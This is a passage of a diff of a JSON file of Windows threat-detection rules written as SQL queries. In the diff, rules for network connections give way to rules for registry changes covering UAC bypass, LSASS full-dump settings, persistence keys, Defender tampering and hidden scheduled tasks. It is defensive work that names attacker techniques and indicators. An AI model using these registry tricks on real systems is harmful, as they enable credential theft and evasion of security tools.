"8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 